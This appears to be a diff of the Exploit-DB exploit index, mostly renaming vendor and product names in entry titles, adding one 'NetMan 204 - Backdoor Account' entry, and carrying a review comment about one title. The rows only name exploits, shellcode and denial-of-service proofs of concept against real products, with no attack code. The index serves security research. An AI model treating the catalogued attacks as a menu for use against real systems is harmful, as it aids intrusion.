 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0
 40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
-29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0
+29096,platforms/windows/remote/29096.rb,"Netgear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0
 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0
 29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0
 29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - /admin/comments.php month Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0
@@ -26258,7 +26261,7 @@ id,file,description,date,author,platform,type,port
 29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0 / 10.0.305.0 - Kernel Driver (fortknoxfw.sys) Memory Corruption",2013-10-24,"Arash Allebrahim",windows,dos,0
 29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 - ticketview.php Multiple Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0
 29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 - ticket.php email Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0
-29167,platforms/windows/remote/29167.rb,"NetGear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0
+29167,platforms/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0
 29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 - SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
 29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 - SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
 29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injection",2006-12-01,ShaFuq31,asp,webapps,0
@@ -26969,8 +26972,8 @@ id,file,description,date,author,platform,type,port
 29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0
 29800,platforms/windows/dos/29800.py,"Microsoft Internet Explorer 7 - HTML Denial of Service",2007-03-28,shinnai,windows,dos,0
 29801,platforms/php/local/29801.php,"PHP 5.2.1 - Session.Save_Path() TMPDIR open_basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0
-29802,platforms/hardware/webapps/29802.txt,"TPLINK WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0
-29803,platforms/windows/dos/29803.pl,"Static Http Server 1.0 - Denial of Service",2013-11-25,GalaxyAndroid,windows,dos,0
+29802,platforms/hardware/webapps/29802.txt,"TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0
+29803,platforms/windows/dos/29803.pl,"Static HTTP Server 1.0 - Denial of Service",2013-11-25,GalaxyAndroid,windows,dos,0
 29804,platforms/php/local/29804.php,"PHP 5.2.1 - Multiple functions Reference Parameter Information Disclosure",2007-03-29,"Stefan Esser",php,local,0
 29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - 404.php Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0
 29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 - Calendar_Panel Module Show_Event.php SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0
@@ -26980,7 +26983,7 @@ id,file,description,date,author,platform,type,port
 29810,platforms/windows/dos/29810.c,"Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0
 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista - ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0
 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 - LPEXT.dll Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0
-29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,hardware,remote,443
+29815,platforms/hardware/remote/29815.rb,"Netgear ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,hardware,remote,443
 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0
 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0
 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0
@@ -27683,7 +27686,7 @@ id,file,description,date,author,platform,type,port
 31530,platforms/php/webapps/31530.txt,"Joomla! / Mambo Component Download3000 1.0 - 'id' Parameter SQL Injection",2008-03-23,S@BUN,php,webapps,0
 31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 - 'haberoku.php' SQL Injection",2008-03-25,cOndemned,php,webapps,0
 30672,platforms/windows/dos/30672.txt,"Live for Speed - Skin Name Buffer Overflow",2007-10-13,"Luigi Auriemma",windows,dos,0
-30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0
+30673,platforms/hardware/remote/30673.txt,"Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0
 30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script - Cross-Site Scripting",2007-10-15,JosS,java,webapps,0
 30675,platforms/jsp/webapps/30675.txt,"InnovaPortal - tc/contents/home001.jsp contentid Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0
 30676,platforms/jsp/webapps/30676.txt,"InnovaPortal - msg.jsp msg Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0
@@ -28551,7 +28554,7 @@ id,file,description,date,author,platform,type,port
 31614,platforms/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,php,webapps,0
 31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial of Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0
 31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0
-31617,platforms/hardware/webapps/31617.txt,"NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0
+31617,platforms/hardware/webapps/31617.txt,"Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0
 31618,platforms/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,ios,webapps,0
 31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 - 'TRIGGER' Parameter Denial of Service",2008-04-21,"Rodrigo Carvalho",osx,dos,0
 31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 - 'ATTACH' Parameter Denial Of Service",2008-04-21,"Core Security Technologies",osx,dos,0
@@ -28742,8 +28745,8 @@ id,file,description,date,author,platform,type,port
 31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0
 31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 - '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting",2008-05-21,DSecRG,java,webapps,0
 31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos,0
-31818,platforms/windows/dos/31818.sh,"vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0
-31819,platforms/windows/dos/31819.pl,"vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (2)",2008-05-21,"Praveen Darshanam",windows,dos,0
+31818,platforms/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0
+31819,platforms/windows/dos/31819.pl,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)",2008-05-21,"Praveen Darshanam",windows,dos,0
 31820,platforms/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",unix,remote,0
 31821,platforms/php/webapps/31821.txt,"PHPFreeForum 1.0 rc2 - error.php message Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0
 31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - part/menu.php Multiple Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0
@@ -29157,7 +29160,7 @@ id,file,description,date,author,platform,type,port
 32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - 'mambots/editors/mostlyce/' PHP/connector.php Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0
 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0
 32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'forum/neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0
-32256,platforms/windows/dos/32256.py,"Ipswitch 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,windows,dos,0
+32256,platforms/windows/dos/32256.py,"Ipswitch WS_FTP Home/Professional 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,windows,dos,0
 32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injection",2008-08-15,baltazar,php,webapps,0
 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0
 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
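Review bot: The new title for 32256 names the product twice, `Ipswitch WS_FTP Home/Professional 8.0 - WS_FTP Client Format String`; the part after the dash should carry only the issue. `"Ipswitch WS_FTP Home/Professional 8.0 - Client Format String"` reads cleanly and follows the vendor, product, version, dash, issue shape that the other retitled rows in this diff use.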
@@ -29432,7 +29435,7 @@ id,file,description,date,author,platform,type,port
 32580,platforms/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect",2014-03-29,"felipe andrian",asp,webapps,0
 32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial Of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0
 32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router - Multiple Scripts Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0
-32583,platforms/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0
+32583,platforms/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0
 32585,platforms/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,windows,local,0
 32586,platforms/windows/remote/32586.py,"Microsoft Active Directory LDAP Server - 'Username' Enumeration",2008-11-14,"Bernardo Damele",windows,remote,0
 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0
@@ -29616,7 +29619,7 @@ id,file,description,date,author,platform,type,port
 32773,platforms/php/webapps/32773.txt,"Simple Machines Forum 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,php,webapps,0
 32774,platforms/multiple/dos/32774.txt,"QIP 2005 - Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos,0
 32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",linux,dos,0
-32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) HTTP Server - Multiple Cross-Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0
+32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0
 32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 - Administration Settings Authentication Bypass",2009-02-04,make0day,php,webapps,0
 32778,platforms/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local,0
 32779,platforms/php/webapps/32779.txt,"Ilch CMS 1.1 - 'HTTP_X_FORWARDED_FOR' SQL Injection",2009-02-06,Gizmore,php,webapps,0
@@ -29721,7 +29724,7 @@ id,file,description,date,author,platform,type,port
 32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Parameter Cross-Site Scripting",2009-03-31,TEAMELITE,php,webapps,0
 32881,platforms/windows/dos/32881.py,"QtWeb Browser 2.0 - Malformed HTML File Remote Denial of Service",2009-04-01,LiquidWorm,windows,dos,0
 32882,platforms/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",asp,webapps,0
-32883,platforms/hardware/webapps/32883.txt,"NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080
+32883,platforms/hardware/webapps/32883.txt,"Netgear N600 Wireless Dual Band WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080
 32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0
 32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root Remote Code Execution (Metasploit)",2014-04-15,"Brandon Perry",unix,remote,443
 32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080
@@ -29971,7 +29974,7 @@ id,file,description,date,author,platform,type,port
 33134,platforms/linux/dos/33134.txt,"Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow",2009-07-30,"Roee Hay",linux,dos,0
 33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,hardware,webapps,0
 33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0
-33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps,0
+33138,platforms/hardware/webapps/33138.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps,0
 33584,platforms/multiple/dos/33584.txt,"IBM DB2 - 'kuddb2' Remote Denial of Service",2010-01-31,"Evgeny Legerov",multiple,dos,0
 33142,platforms/multiple/remote/33142.rb,"Apache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-05-02,Metasploit,multiple,remote,8080
 33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)",2014-05-02,"Brandon Perry",hardware,remote,443
@@ -30847,7 +30850,7 @@ id,file,description,date,author,platform,type,port
 34134,platforms/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local,0
 34161,platforms/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80
 34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
-34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0
+34149,platforms/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0
 34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service",2010-06-17,"Luigi Auriemma",windows,dos,0
 34159,platforms/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
 34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0
@@ -31227,8 +31230,8 @@ id,file,description,date,author,platform,type,port
 34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.x - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80
 34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0
 34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
-34583,platforms/hardware/webapps/34583.txt,"TP-Link Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
-34584,platforms/hardware/webapps/34584.txt,"TP-Link Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
+34583,platforms/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
+34584,platforms/hardware/webapps/34584.txt,"TP-Link TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
 34585,platforms/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443
 34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
 34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090
@@ -31791,7 +31794,7 @@ id,file,description,date,author,platform,type,port
 35185,platforms/php/webapps/35185.txt,"WonderCMS 0.3.3 - 'editText.php' Cross-Site Scripting",2011-01-04,"High-Tech Bridge SA",php,webapps,0
 35186,platforms/php/webapps/35186.txt,"WikLink 0.1.3 - Multiple SQL Injections",2011-01-10,"Aliaksandr Hartsuyeu",php,webapps,0
 35187,platforms/php/webapps/35187.txt,"Joostina 1.3 - 'index.php' Cross-Site Scripting",2011-01-08,MustLive,php,webapps,0
-35188,platforms/windows/remote/35188.py,"SolarFTP 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0
+35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0
 35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
 35191,platforms/php/webapps/35191.txt,"CMS Tovar - 'tovar.php' SQL Injection",2011-01-11,jos_ali_joe,php,webapps,0
@@ -31908,7 +31911,7 @@ id,file,description,date,author,platform,type,port
 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
 35323,platforms/php/webapps/35323.md,"MyBB 1.8.2 - unset_globals() Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",php,webapps,0
 35324,platforms/php/webapps/35324.txt,"WordPress Plugin CM Download Manager 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0
-35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
+35325,platforms/hardware/webapps/35325.txt,"Netgear WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - 'win32k.sys' Denial of Service",2014-11-22,Kedamsky,windows,dos,0
 35380,platforms/php/remote/35380.rb,"Pandora Fms - SQL Injection Remote Code Execution (Metasploit)",2014-11-26,Metasploit,php,remote,80
 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0
@@ -31933,6 +31936,7 @@ id,file,description,date,author,platform,type,port
 35346,platforms/php/webapps/35346.txt,"Wordpress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0
 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0
 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0
+40431,platforms/hardware/remote/40431.txt,"NetMan 204 - Backdoor Account",2016-09-27,"Saeed reza Zamanian",hardware,remote,0
 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
 35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting / HTML Injection / Information Disclosure",2011-02-15,"High-Tech Bridge SA",php,webapps,0
 35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
@@ -32358,7 +32362,7 @@ id,file,description,date,author,platform,type,port
 35814,platforms/php/webapps/35814.txt,"TEDE Simplificado 1.01/S2.04 - Multiple SQL Injections",2011-06-01,KnocKout,php,webapps,0
 35815,platforms/php/webapps/35815.pl,"PikaCMS - Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
 35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection",2011-06-01,"High-Tech Bridge SA",php,webapps,0
-35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0
+35817,platforms/hardware/remote/35817.txt,"Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0
 35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Parameter Cross-Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0
 35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 - 'range' Parameter SQL Injection",2011-06-02,"Gjoko Krstic",php,webapps,0
 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0
@@ -32899,7 +32903,7 @@ id,file,description,date,author,platform,type,port
 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0
 36385,platforms/php/webapps/36385.txt,"Joomla! Component Simple Photo Gallery 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",php,webapps,0
 36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0
-36405,platforms/windows/dos/36405.txt,"Serv-U 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0
+36405,platforms/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0
 36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,local,0
 36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 - 'index.php' task Parameter Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps,0
 36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0
@@ -33699,7 +33703,7 @@ id,file,description,date,author,platform,type,port
 37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQL Injection",2015-06-09,Pancaker,php,webapps,0
 37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0
 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
-37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
+37238,platforms/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC (2)",2015-06-08,"Pawel Wylecial",windows,dos,0
 37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
@@ -34135,10 +34139,10 @@ id,file,description,date,author,platform,type,port
 37717,platforms/windows/dos/37717.pl,"KMPlayer 3.9.x - '.srt' Crash (PoC)",2015-07-31,"Peyman Motevalli Manesh",windows,dos,0
 37718,platforms/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash (PoC)",2015-07-31,"SATHISH ARTHAR",windows,dos,0
 37719,platforms/windows/dos/37719.py,"Acunetix Web Vulnerability Scanner 9.5 - Crash (PoC)",2015-07-31,"Hadi Zomorodi Monavar",windows,dos,0
-37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0
-37721,platforms/multiple/dos/37721.c,"ISC BIND9 - TKEY (PoC)",2015-08-01,"Errata Security",multiple,dos,0
+37720,platforms/hardware/webapps/37720.py,"Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0
+37721,platforms/multiple/dos/37721.c,"ISC BIND 9 - TKEY (PoC)",2015-08-01,"Errata Security",multiple,dos,0
 37722,platforms/linux/local/37722.c,"Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)",2015-08-05,"Andrew Lutomirski",linux,local,0
-37723,platforms/multiple/dos/37723.py,"ISC BIND9 - TKEY Remote Denial of Service (PoC)",2015-08-05,elceef,multiple,dos,0
+37723,platforms/multiple/dos/37723.py,"ISC BIND 9 - TKEY Remote Denial of Service (PoC)",2015-08-05,elceef,multiple,dos,0
 37724,platforms/linux/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",linux,local,0
 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0
 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80
@@ -34491,7 +34495,7 @@ id,file,description,date,author,platform,type,port
 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit Shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
